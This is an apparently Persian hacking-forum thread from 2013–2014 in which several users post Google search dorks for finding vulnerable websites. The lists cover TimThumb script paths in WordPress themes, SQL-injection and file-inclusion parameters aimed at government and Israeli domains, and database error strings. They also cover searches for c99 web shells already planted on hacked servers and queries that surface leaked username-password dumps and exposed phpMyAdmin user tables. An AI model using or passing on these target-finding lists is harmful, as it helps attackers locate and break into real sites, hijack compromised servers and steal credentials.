/wp-content/themes/thejournal/thumb.php “/themes/thejournal”
/wp-content/themes/suitandtie/thumb.php “/themes/suitandtie”
/wp-content/themes/sophisticatedfolio/thumb.php “/themes/sophisticatedfolio”
/wp-content/themes/slanted/thumb.php “/themes/slanted”
/wp-content/themes/royalle/thumb.php “/themes/royalle”
/wp-content/themes/therapy/thumb.php “/themes/therapy”
/wp-content/themes/Nostra/scripts/timthumb.php “/themes/Nostra”
/wp-content/themes/proudfolio/thumb.php “/themes/proudfolio”
/wp-content/themes/mystream/thumb.php “/themes/mystream”
/wp-content/themes/groovyblog/thumb.php “/themes/groovyblog”
/wp-content/themes/gothamnews/thumb.php “/themes/gothamnews”
/wp-content/themes/overeasy/thumb.php “/themes/overeasy”
/wp-content/themes/papercut/thumb.php “/themes/papercut”
/wp-content/themes/postcard/thumb.php “/themes/postcard”
/wp-content/themes/productum/thumb.php “/themes/productum”
/wp-content/themes/gazette/thumb.php “/themes/gazette”
/wp-content/themes/freshnews/thumb.php “/themes/freshnews”
/wp-content/themes/freshfolio/thumb.php “/themes/freshfolio”
/wp-content/themes/forewordthinking/thumb.php “/themes/forewordthinking”
/wp-content/themes/featurepitch/thumb.php “/themes/featurepitch”
/wp-content/themes/f0101/thumb.php “/themes/f0101?
/wp-content/themes/exposure/thumb.php “/themes/exposure”
/wp-content/themes/bigeasy/thumb.php “/themes/bigeasy”
/wp-content/themes/backstage/thumb.php “/themes/backstage”
/wp-content/themes/aperture/thumb.php “/themes/aperture”
/wp-content/themes/EarthlyTouch/timthumb.php “/themes/EarthlyTouch”
/wp-content/themes/retreat/thumb.php “/themes/retreat”
/wp-content/themes/skeptical/thumb.php “/themes/skeptical”
/wp-content/themes/Quadro/timthumb.php “/themes/Quadro”
/wp-content/themes/arras/library/timthumb.php “/themes/arras”
/wp-content/themes/placeholder/thumb.php “/themes/placeholder”
/wp-content/themes/mayumi/thumb/thumb.php “/themes/mayumi”
/wp-content/themes/Designora-theme/timthumb.php “/themes/Designora-theme”
/wp-content/themes/crisp/thumb.php “/themes/crisp”
/wp-content/themes/simplicity/thumb.php “/themes/simplicity”
/wp-content/themes/gallery/includes/timthumb.php “/themes/gallery”
/wp-content/themes/BlueBubble/scripts/timthumb.php “/themes/BlueBubble”
/wp-content/themes/journalcrunch/timthumb.php “/themes/journalcrunch”
/wp-content/themes/marikit/timthumb.php “/themes/marikit”
/wp-content/themes/masunurin/timthumb.php “/themes/masunurin”
/wp-content/themes/wpoupon/timthumb.php “/themes/wpoupon”
/wp-content/themes/docksidecorporate/thumb.php “/themes/docksidecorporate”
/wp-content/themes/docksidecampaign/thumb.php “/themes/docksidecampaign”

shadow1020
12-11-2013, 09:03 PM
/wp-content/themes/wpnewspaper/timthumb.php “/themes/wpnewspaper”
/wp-content/themes/city-desk/timthumb.php “/themes/city-desk”
/wp-content/themes/citydesk/timthumb.php /themes/citydesk”
/wp-content/themes/strikon/timthumb.php “/themes/strikon”
/wp-content/themes/dt-chocolate/thumb.php “/themes/dt-chocolate”
/wp-content/themes/BISING/scripts/timthumb.php “/themes/BISING”
/wp-content/themes/breakingnews/tools/timthumb.php “/themes/breakingnews”
/wp-content/themes/manifesto/scripts/timthumb.php “/themes/manifesto”
/wp-content/themes/cadabrapress/scripts/timthumb.php “/themes/cadabrapress”
/wp-content/themes/ChannelPro/timthumb.php “/themes/ChannelPro”
/wp-content/themes/u-design/scripts/timthumb.php “/themes/u-design”
/wp-content/themes/Reporter/timthumb.php “/themes/Reporter”
/wp-content/themes/Feather/timthumb.php “/themes/Feather”
/wp-content/themes/dandelion_v2.6.1/timthumb.php /themes/dandelion_v2.6.1/
/wp-content/themes/dandelion/timthumb.php “/themes/dandelion”
/wp-content/themes/Accent/timthumb.php “/themes/Accent”
/wp-content/themes/Modest/timthumb.php “/themes/Modest”
/wp-content/themes/Webly/timthumb.php “/themes/Webly”
/wp-content/themes/Envisioned/timthumb.php “/themes/Envisioned”
/wp-content/themes/MyCuisine/timthumb.php “/themes/MyCuisine”
/wp-content/themes/InReview/timthumb.php “/themes/InReview”
/wp-content/themes/Chameleon/timthumb.php “/themes/Chameleon”
/wp-content/themes/LeanBiz/timthumb.php “/themes/LeanBiz”
/wp-content/themes/HandHeld/timthumb.php “/themes/HandHeld”
/wp-content/themes/Sky/timthumb.php “/themes/Sky”
/wp-content/themes/CNotebook/timthumb.php “/themes/Notebook”
/wp-content/themes/Convertible/timthumb.php “/themes/Convertible”
/wp-content/themes/network/library/timthumb.php “/themes/network”
/wp-content/themes/delicate/thumb.php “/themes/delicate”
/wp-content/themes/PhotopurePress/backend/timthumb.php “/themes/PhotopurePress”
/wp-content/themes/Photoblog/scripts/timthumb.php “/themes/Photoblog”
/wp-content/themes/Elessa/timthumb.php “/themes/Elessa”
/wp-content/themes/Nyke/timthumb.php “/themes/Nyke”
/wp-content/themes/masipag/thumb/thumb.php “/themes/masipag”
/wp-content/themes/zinfolio-theme/timthumb.php “/themes/zinfolio-theme”
/wp-content/themes/papercut/thumb.php “/themes/papercut”
/wp-content/themes/editorial/thumb.php “/themes/editorial”
/wp-content/themes/Zagetti/lib/shortcodes/includes/timthumb.php “/themes/Zagetti”
/wp-content/themes/InnovationScience2/thumb.php “/themes/InnovationScience2?
/wp-content/themes/InnovationScience/thumb.php “/themes/InnovationScience”
/wp-content/plugins/wp_roknewspager/thumb.php “/plugins/wp_roknewspager/”
/wp-content/themes/blacklabel/framework/timthumb.php “/themes/blacklabel/”
/wp-content/themes/revolt-basic/thumb.php “/themes/revolt-basic”
/wp-content/themes/diner/thumb.php “/themes/diner”
/wp-content/themes/snapshot/thumb.php “/themes/snapshot”
/wp-content/themes/womantheme/thumb.php “/themes/womantheme”
/wp-content/themes/Kin/timthumb.php “/themes/Kin”
/wp-content/themes/Gadgetine/scripts/timthumb.php “/themes/Gadgetine”
/wp-content/themes/Gadgetine/Gadgetine/scripts/timthumb.php “/themes/Gadgetine/Gadgetine”
/wp-content/themes/theunstandard/scripts/timthumb.php “/themes/theunstandard/”
/wp-content/themes/MyCuisine/timthumb.php “/themes/MyCuisine”
/wp-content/themes/metrolo/scripts/thumb.php “/themes/metrolo”
/wp-content/themes/garden/timthumb.php “/themes/garden”
/wp-content/themes/weekly/timthumb.php “/themes/weekly”
/wp-content/themes/a-supercms/timthumb.php “/themes/a-supercms”
/wp-content/themes/Pleng/timthumb.php “/themes/Pleng/”
/wp-content/themes/backstage/thumb.php “/themes/backstage/”
/wp-content/themes/fotofolio/scripts/timthumb.php “/themes/fotofolio”
/wp-content/themes/foodilicious/thumb.php “/themes/foodilicious”
/wp-content/themes/GeoPlaces3/thumb.php “/themes/GeoPlaces3/”
/wp-content/themes/Traject%20v1.2.3/includes/timthumb.php “/themes/Traject%20v1.2.3/”
/wp-content/themes/Traject/includes/timthumb.php “/themes/Traject”
/wp-content/themes/purevision/scripts/timthumb.php “/themes/purevision”
/wp-content/themes/indomagz_2/thumb.php “/themes/indomagz_2/”
/wp-content/themes/indomagz/thumb.php “/themes/indomagz”
/wp-content/themes/division/timthumb.php “/themes/division”
/wp-content/themes/presstige/thumb.php “/themes/presstige”
/wp-content/themes/mynxx/timthumb.php “/themes/mynxx”
/wp-content/themes/blackswan/timthumb.php “/themes/blackswan”
/wp-content/themes/platinoom/thumb.php “/themes/platinoom”
/wp-content/themes/realtorpress/thumbs/_tbs.php “/themes/realtorpress”
/wp-content/themes/shopperpress/thumbs/_tbs.php “/themes/shopperpress”
/wp-content/themes/asenwa/timthumb.php “/themes/asenwa”
/wp-content/themes/Gunungkidul/thumb.php “/themes/Gunungkidul”
/wp-content/themes/wp-clear/scripts/timthumb.php “/themes/wp-clear”
/wp-content/themes/Karma/functions/thumbs.php “/themes/Karma”
/wp-content/themes/infocus/lib/scripts/thumb.php “/themes/infocus”
/wp-content/plugins/simple-post-thumbnails/timthumb.php “/plugins/simple-post-thumbnails”
/wp-content/themes/LondonLive/thumb.php “/themes/LondonLive”
/wp-content/themes/neulane/scripts/timthumb.php “/themes/neulane”
/wp-content/themes/lakeeffect/timthumb.php “/themes/lakeeffect”
/wp-content/themes/workaholic/includes/timthumb.php “/themes/workaholic”
/wp-content/themes/mimbopro/scripts/timthumb.php “/themes/mimbopro”
/wp-content/themes/Gadgetine/scripts/timthumb.php “/themes/Gadgetine”
wp-content/themes/sakura/plugins/woo-tumblog/thumb.php wp-content/themes/sakura/plugins/woo-tumblog/
/wp-content/themes/sakura/plugins/woo-tumblog/thumb.php “/themes/sakura”
/wp-content/themes/astra/timthumb.php “/themes/astra”
/wp-content/themes/envision%20v1.0/thumb.php “/themes/envision%20v1.0?
/wp-content/themes/envision/thumb.php “/themes/envision”
/wp-content/themes/anthology/timthumb.php “/themes/anthology”
/wp-content/themes/airborn/advance/inc/timthumb.php /wp-content/themes/airborn/advance/
/wp-content/themes/eCommerce/thumb.php “/themes/eCommerce”
/wp-content/themes/business-success/scripts/timthumb.php “/themes/business-success”
/wp-content/themes/eventina_2.2/scripts/timthumb.php “/themes/eventina”
/wp-content/themes/eventina/scripts/timthumb.php “/themes/eventina”
wp-content/themes/lifestyle_40/tools/timthumb.php wp-content/themes/lifestyle_40/
wp-content/themes/wp-clear-prem/scripts/timthumb.php wp-content/themes/wp-clear-prem
/wp-content/themes/adcents/timthumb/timthumb.php “/themes/adcents”
/wp-content/themes/Lumin/timthumb.php “/themes/Lumin”
/wp-content/themes/Emporium/thumb.php “/themes/Emporium”
/wp-content/themes/Envisioned/timthumb.php “/themes/Envisioned”
/wp-content/themes/teardrop/timthumb.php “/themes/teardrop”
/wp-content/themes/ecobiz/timthumb.php “/themes/ecobiz”
/wp-content/themes/eVidTheme/timthumb.php “/themes/eVidTheme”
/wp-content/themes/Weekly_v1.0.1/timthumb.php wp-content/themes/Weekly_v1.0.1
/wp-content/themes/MinimlPress/MinimlPress/_scripts/timthumb.php wp-content/themes/MinimlPress/MinimlPress
/wp-content/themes/mercedesa/includes/thumb.php “/themes/mercedesa”
/wp-content/themes/Growing-Feature/includes/thumb.php “/themes/Growing-Feature”
/wp-content/themes/storeelegance/thumb.php “/themes/storeelegance”
/wp-content/themes/Transcript/timthumb.php “/themes/Transcript”
/wp-content/themes/Transcript2/timthumb.php “/themes/Transcript2?
/wp-content/themes/web1/php/timthumb.php “/themes/web1?
/wp-content/themes/newline/thumb.php “/themes/newline”
/wp-content/themes/invictus/timthumb.php “/themes/invictus”
/wp-content/themes/welcome_inn/thumb.php “/themes/welcome_inn”
/wp-content/themes/especial/libraries/timthumb.php “/themes/especial”
/wp-content/themes/newstimes/includes/timthumb.php “/themes/newstimes”
/wp-content/themes/Real-Estate-v1.3/thumb.php “/themes/Real-Estate-v1.3/”
/wp-content/themes/Bronte/timthumb.php “/themes/Bronte”
/wp-content/themes/Shuttershot/timthumb.php “/themes/Shuttershot”
/wp-content/themes/metrolo/scripts/thumb.php “/themes/metrolo”
/wp-content/themes/rt_mynxx_wp/timthumb.php “/themes/rt_mynxx_wp”
/wp-content/themes/feature-list/thumb.php “/themes/feature-list”
/wp-content/themes/purevision/scripts/timthumb.php “/themes/purevision”
/wp-content/themes/Canny/tools/timthumb.php “/themes/Canny”
/wp-content/themes/Primal/timthumb.php “/themes/Primal”
/wp-content/themes/Orion/timthumb.php “/themes/Orion”
/wp-content/themes/Faith/timthumb.php “/themes/Faith”
/wp-content/plugins/islidex/js/timthumb.php “/plugins/islidex”
/wp-content/themes/CleanAds/includes/timthumb.php “/themes/CleanAds”
/wp-content/themes/LeanBiz/timthumb.php “/themes/LeanBiz”
/wp-content/themes/Mentor/timthumb.php “/themes/Mentor”
/wp-content/themes/Primal/timthumb.php “/themes/Primal”
/wp-content/themes/Leon/timthumb.php “/themes/Leon”
/wp-content/themes/academica/scripts/timthumb.php “/themes/academica”
/wp-content/themes/DynamiX/lib/scripts/timthumb.php “/themes/DynamiX”
/wp-content/plugins/really-easy-slider/inc/thumb.php “/plugins/really-easy-slider”
/wp-content/themes/makintab-red/functions/timthumb.php “/themes/makintab-red”
/wp-content/themes/makintab/functions/timthumb.php “/themes/makintab”
/wp-content/plugins/highlighter/libs/timthumb.php “/plugins/highlighter”
/wp-content/themes/milky/timthumb/timthumb_ws.php “/themes/milky”
/wp-content/themes/milky/timthumb/timthumb.php “/themes/milky

shadow1020
12-11-2013, 09:04 PM
inurl:Pageid= site:*gov
inurl:Pagina.php?left= site:*.gov.au
inurl:layout.php?id=120'= site:*gov.pl
inurl:Principal.php?id=123'= site:*gov.uk
inurl:standard.php?base_dir= site:*gov
inurl:home.php?where= site:*gov.pl
inurl:Page.php?sivu= site:*.pl
inurl:*inc*.php?adresa= site:*gov
inurl:Padrao.php?str= site:*gov
inurl:include.php?my= site:*.gov.af
inurl:show.php?home= site:*gov.br
inurl:index.php?lid=20= site:*gov.au
inurl:Principal.php?id=30= site:*gov
inurl:file.php?id=205= site:*gov.au
inurl:info.php?id=25155= site:*gov.af
inurl:enter.php?id=203= site:*gov.uk
inurl:general.php?id=50= site:*gov
inurl:Principal.php?id=705= site:*gov.za
inurl:standard.php?id=303= site:*.gov.ie
nurl:nota.php?v= site:*gov.bc.ca
inurl:home.php?str= site:*ed.gov

shadow1020
12-11-2013, 09:06 PM
intext:"error in your SQL syntax" +site:il

intext:"mysql_num_rows()" +site:il

intext:"mysql_fetch_array()" +site:il

intext:"Error Occurred While Processing Request" +site:il

intext:"Server Error in '/' Application" +site:il

intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:il

intext:"Invalid Querystring" +site:il

intext:"OLE DB Provider for ODBC" +site:il

intext:"VBScript Runtime" +site:il

intext:"ADODB.Field" +site:il

intext:"BOF or EOF" +site:il

intext:"ADODB.Command" +site:il

intext:"JET Database" +site:il

intext:"mysql_fetch_row()" +site:il

intext:"Syntax error" +site:il

intext:"include()" +site:il

intext:"mysql_fetch_assoc()" +site:il

intext:"mysql_fetch_object()" +site:il

intext:"mysql_numrows()" +site:il

intext:"GetArray()" +site:il

intext:"FetchRow()" +site:il

intext:"Input string was not in a correct format" +site:il

geri
12-29-2013, 11:52 AM
اینم سری جدید دورک ها:44:

[sql]

about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=

Milad.BlackHat
01-22-2014, 12:54 AM
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:age.php?id=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:tray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=, inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:ost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

Milad.BlackHat
01-22-2014, 01:10 AM
afe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
inurl:"c99.php" c99shell
c99shell powered by admin
inurl:"/c99.php"
c99 shell v.1.0 (roots)
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
inurl:/c99.php+uname
"c99.php" filetype:php
c99shell filetype:php -echo
C99Shell v. 1.0 pre-release build #5
!c99shell v. 1+Safe-mode: OFF (not secure)
intitle:c99shell +filetype:php
intitle:C99Shell v. 1.0 pre-release +uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
ftp apache inurl:c99.php
intitle:c99shell uname -bbpress
intitle:"index of" + c99.php
intitle:index/of file c99.php
index of /admin/files/
c99.php "intitle:Index of "
"Index of/"+c99.php

Milad.BlackHat
01-22-2014, 01:46 PM
rainers.php?id=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
“id=” & intext:”Warning: mysql_fetch_array()
“id=” & intext:”Warning: getimagesize()
“id=” & intext:”Warning: session_start()
“id=” & intext:”Warning: mysql_num_rows()
“id=” & intext:”Warning: mysql_query()
“id=” & intext:”Warning: array_merge()
“id=” & intext:”Warning: preg_match()
“id=” & intext:”Warning: ilesize()
“id=” & intext:”Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
“id=” & intext:”Warning: mysql_fetch_assoc()
“id=” & intext:”Warning: is_writable()
“id=” & intext:”Warning: Unknown()
“id=” & intext:”Warning: mysql_result()
“id=” & intext:”Warning: pg_exec()
“id=” & intext:”Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
index.php?=
profile_view.php?id=
category.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
tradeCategory.php?id=
transcript.php?id=
item_id=
news-full.php?id=
aboutbook.php?id=
preview.php?id=
material.php?id=
read.php?id=
viewapp.php?id=
story.php?id=
newsone.php?id=
rubp.php?idr=
art.php?idm=
title.php?id=
index1.php?modo=
include.php?* *=
nota.php?pollname=
index3.php?p=
padrao.php?pre=
home.php?pa=
main.php?type=
sitio.php?start=
*.php?include=
general.php?xlink=
show.php?go=
nota.php?ki=
down*.php?oldal=
layout.php?disp=
enter.php?chapter=
base.php?incl=
enter.php?mod=
show.php?corpo=
head.php?* *=
info.php?strona=
template.php?str=
main.php?doshow=
view.php?* *=
index.php?to=
page.php?cmd=
view.php?b=
info.php?option=
show.php?x=
template.php?texto=
index3.php?ir=
print.php?chapter=
file.php?inc=
file.php?cont=
view.php?cmd=
include.php?chapter=
path.php?my=
principal.php?param=
general.php?menue=
index1.php?b=
info.php?chapter=
nota.php?chapter=
general.php?include=
start.php?addr=
index1.php?qry=
index1.php?loc=
page.php?addr=
index1.php?dir=
principal.php?Google Page Ranking=
press.php?seite=
head.php?cmd=
home.php?sec=
home.php?category=
standard.php?cmd=
mod*.php?thispage=
base.php?to=
view.php?choix=
base.php?panel=
template.php?mod=
info.php?j=
blank.php?pref=
sub*.php?channel=
standard.php?in=
general.php?cmd=
pagina.php?panel=
template.php?where=
path.php?channel=
gery.php?seccion=
page.php?tipo=
sitio.php?rub=
pagina.php?u=
file.php?ir=
*inc*.php?sivu=
path.php?start=
page.php?chapter=
home.php?recipe=
enter.php?pname=
layout.php?path=
print.php?open=
mod*.php?channel=
down*.php?phpbb_root_path=
*inc*.php?str=
gery.php?phpbb_root_path=
include.php?middlePart=
sub*.php?destino=
info.php?read=
home.php?sp=
main.php?strona=
sitio.php?get=
sitio.php?index=
index3.php?option=
enter.php?a=
main.php?second=
print.php?pname=
blank.php?itemnav=
blank.php?pagina=
index1.php?d=
down*.php?where=
*inc*.php?include=
path.php?pre=
home.php?loader=
start.php?eval=
index.php?disp=
head.php?mod=
sitio.php?section=
nota.php?doshow=
home.php?seite=
home.php?a=
page.php?url=
pagina.php?left=
layout.php?c=
principal.php?goto=
standard.php?base_dir=
home.php?where=
page.php?sivu=
*inc*.php?adresa=
padrao.php?str=
include.php?my=
show.php?home=
index.php?load=
index3.php?rub=
sub*.php?str=
start.php?index=
nota.php?mod=
sub*.php?mid=
index1.php?* *=
pagina.php?oldal=
padrao.php?loc=

Spoofer
01-23-2014, 12:30 PM
Private Dorks SQL


ما رو چی به این حرفا

:)


inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker

inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
